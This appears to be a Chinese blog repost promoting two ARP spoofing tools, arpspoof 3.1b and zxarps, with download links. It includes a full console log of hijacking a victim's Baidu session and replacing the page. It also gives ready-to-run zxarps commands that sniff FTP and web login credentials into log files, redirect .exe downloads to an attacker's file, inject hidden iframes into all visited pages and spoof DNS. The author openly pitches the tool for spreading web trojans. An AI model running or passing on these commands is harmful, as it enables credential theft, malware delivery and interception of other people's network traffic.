最近幻影的两个ARP欺骗工具 挺不错的
?arpspoof 3.1b
主要功能:ARP欺騙過程中進行數據修改,實現會話劫持攻擊
說明: 本程序公開源代碼,為了換取更多朋友的指教
實例: 欺騙192.168.0.108訪問百度網站的全過程(注:#后是我加的注釋)
效果: 192.168.0.108看到的百度首頁只有一句話“Hack by cooldiyer”,攻擊成功。
圖解:
__________________________________________________________________________________
F:/arpspoof/Release>arpspoof /n
ARPSpoof 3.1b by CoolDiyer 06-10-30
[+] Replace Job file job.txt release success... # 利用程序自動生成的規則文件,就能搞定
F:/arpspoof/Release>arpspoof 192.168.0.1 192.168.0.108 80 2 1 /r job.txt
ARPSpoof 3.1b by CoolDiyer 06-10-30
[*] Parsing rul <hea ==> Hack by cooldiyer<noframes> # 程序加載文件job.txt中的規則,可用arpspoof /n生成模板
[*] Parsing rul <HEA ==> Hack by cooldiyer<noframes>
[+] Loaded 2 rules... # 共加載了兩條規則,如果文件格式不對,程序在這里會中斷
[*] Spoofing 192.168.0.1 <-> 192.168.0.108 # 開始arpspoof欺騙,監視轉發的數據包
[+] Caught 192.168.0.108:4304 -> 202.108.22.43:80 # 程序捕捉到了一個需要轉發的數據包,但沒找到要替換的字符串
[*] Forwarding untouched packet of size 62 # 所以直接轉發出去,以下幾個也是
[+] Caught 202.108.22.43:80 -> 192.168.0.108:4304 # ............
[*] Forwarding untouched packet of size 62
[+] Caught 192.168.0.108:4304 -> 202.108.22.43:80
[*] Forwarding untouched packet of size 60
[+] Caught 192.168.0.108:4304 -> 202.108.22.43:80
[*] Forwarding untouched packet of size 399
[+] Caught 202.108.22.43:80 -> 192.168.0.108:4304
[*] Forwarding untouched packet of size 60
[+] Caught 202.108.22.43:80 -> 192.168.0.108:4304 # 程序捕捉到了一個需要轉發的數據包,找到了要替換的內容,應用規則。
Applying rul <hea ==> Hack by cooldiyer<noframes> # 把“<hea”替換成了“Hack by cooldiyer<noframes>”
[*] Done 1 replacements, forwarding packet of size 1474 # 給出提示這個數據包被替換了多少次,替換后包的大小 (調試用的)
[+] Caught 202.108.22.43:80 -> 192.168.0.108:4304
[*] Forwarding untouched packet of size 1474
[+] Caught 192.168.0.108:4304 -> 202.108.22.43:80
[*] Forwarding untouched packet of size 60
[+] Caught 202.108.22.43:80 -> 192.168.0.108:4304
[*] Forwarding untouched packet of size 237
[+] Caught 192.168.0.108:4304 -> 202.108.22.43:80
[*] Forwarding untouched packet of size 60
[+] Reseting ..... # Ctrl+C,程序自動恢復受騙主機的ARP緩存
[-] Sleep 5s ............ # 5秒退出
__________________________________________________________________________________
其它說明:
arpspoof 192.168.0.1 192.168.0.108 80 2 1 /s sniff.log
可保存數據到文件,
arpspoof 192.168.0.1 192.168.0.108 80 2 1
只顯示數據
被替換的字符串要盡可能的短,這樣能減少程序負擔,可參考arpspoof /n生成的規則文件job.txt
需要說的是程序在公網下照樣使用,我已經解說過了,不再舉例.........
規則文件的使用可以看程序的書寫,本程序開放源代碼
希望測試出更多Bug, 我努力更新。。
By CoolDiyer 2006-11-12
下載:http://allyesno.gbaopan.com/files/127df7d9d1ee441d9994959af8e24c21.gbp
zxarps
在當今網馬橫飛的日子,我帖個東東,讓網馬飛得更猛烈些吧
說明:
需要winPcap
基于arp欺騙,
具體功能看下面的使用說明~~~懶得打太多字了~~~
一些注意:
通常欺騙都是針對 網關和同網段下的其他機,所以-sethost [ip] 參數可以不填,
但如果同網段下有某server,而你想嗅探其他用戶到該server的數據就要-sethost serverIP
Codz:
0. Realtek RTL8139 ????IP Address. . . . . : 192.168.1.101 ????Physical Address. . : 00-11-D8-6B-5E-19 ????Default Gateway . . : 192.168.1.1 1. WAN (PPP/SLIP) Interface ????IP Address. . . . . : xx.xx.xx.xx ????Physical Address. . : 00-52-00-00-00-00 ????Default Gateway . . : xx.xx.xx.xx options: ????-idx [index]???????網卡索引號 ????-ip [ip]???????????欺騙的IP,用'-'指定范圍,','隔開 ????-sethost [ip]??????默認是網關,可以指定別的IP ????-port [port]???????關注的端口,用'-'指定范圍,','隔開,沒指定默認關注所有端口 ????-reset?????????????恢復目標機的ARP表 ????-hostname??????????探測主機時獲取主機名信息 ????-logfilter [string]設置保存數據的條件,必須+-_做前綴,后跟關鍵字, ???????????????????????','隔開關鍵字,多個條件'|'隔開 ???????????????????????所有帶+前綴的關鍵字都出現的包則寫入文件 ???????????????????????帶-前綴的關鍵字出現的包不寫入文件 ???????????????????????帶_前綴的關鍵字一個符合則寫入文件(如有+-條件也要符合) ????-save_a [filename] 將捕捉到的數據寫入文件 ACSII模式 ????-save_h [filename] HEX模式 ????-hacksite [ip]?????指定要插入代碼的站點域名或IP, ???????????????????????多個可用','隔開,沒指定則影響所有站點 ????-insert [html code]指定要插入html代碼 ????-postfix [string]??關注的后綴名,只關注HTTP/1.1 302 ????-hackURL [url]?????發現關注的后綴名后修改URL到新的URL ????-filename [name]???新URL上有效的資源文件名 ????-hackdns [string]??DNS欺騙,只修改UDP的報文,多個可用','隔開 ???????????????????????格式: 域名|IP,www.aa.com|222.22.2.2,www.bb.com|1.1.1.1 ????-Interval [ms]?????定時欺騙的時間間隔,單位:毫秒:默認是3000 ms ????-spoofmode [1|2|3] 將數據騙發到本機,欺騙對象:1為網關,2為目標機,3為兩者(默認) ????-speed [kb]????????限制指定的IP或IP段的網絡總帶寬,單位:KB example: ????嗅探指定的IP段中端口80的數據,并以HEX模式寫入文件 ????zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.50 -port 80 -save_h sniff.log ????FTP嗅探,在21或2121端口中出現USER或PASS的數據包記錄到文件 ????zxarps.exe -idx 0 -ip 192.168.0.2 -port 21,2121 -spoofmode 2 -logfilter "_USER ,_PASS" -save_a sniff.log ????HTTP web郵箱登陸或一些論壇登陸的嗅探,根據情況自行改關鍵字 ????zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.50 -port 80 -logfilter "+POST ,+user,+pass" -save_a sniff.log ????用|添加嗅探條件,這樣FTP和HTTP的一些敏感關鍵字可以一起嗅探 ????zxarps.exe -idx 0 -ip 192.168.0.2 -port 80,21 -logfilter "+POST ,+user,+pass|_USER ,_PASS" -save_a sniff.log ????如果嗅探到目標下載文件后綴是exe等則更改Location:為http://xx.net/test.exe ????zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.12,192.168.0.20-192.168.0.30 -spoofmode 3 -postfix ".exe,.rar,.zip" -hackurl http://xx.net/ -filename test.exe ????指定的IP段中的用戶訪問到-hacksite中的網址則只顯示just for fun ????zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.99 -port 80 -hacksite 222.2.2.2,www.a.com,www.b.com -insert "just for fun<noframes>" ????指定的IP段中的用戶訪問的所有網站都插入一個框架代碼 ????zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.99 -port 80 -insert "<iframe src='xx' width=0 height=0>" ????指定的兩個IP的總帶寬限制到20KB ????zxarps.exe -idx 0 -ip 192.168.0.55,192.168.0.66 -speed 20 ????DNS欺騙 ????zxarps.exe -idx 0 -ip 192.168.0.55,192.168.0.66 -hackdns "www.aa.com|222.22.2.2,www.bb.com|1.1.1.1" zxarps Build 01/19/2007 By LZX. |
?
下載:http://allyesno.gbaopan.com/files/caef438cb81649dda7da376e515be0b7.gbp
???????????再分享一下我老師大神的人工智能教程吧。零基礎!通俗易懂!風趣幽默!還帶黃段子!希望你也加入到我們人工智能的隊伍中來!https://blog.csdn.net/jiangjunshow
總結
以上是生活随笔為你收集整理的最近幻影的两个ARP欺骗工具 挺不错的的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: maven引入阿里云镜像源(Maven下
- 下一篇: 微信小程序开发常用代码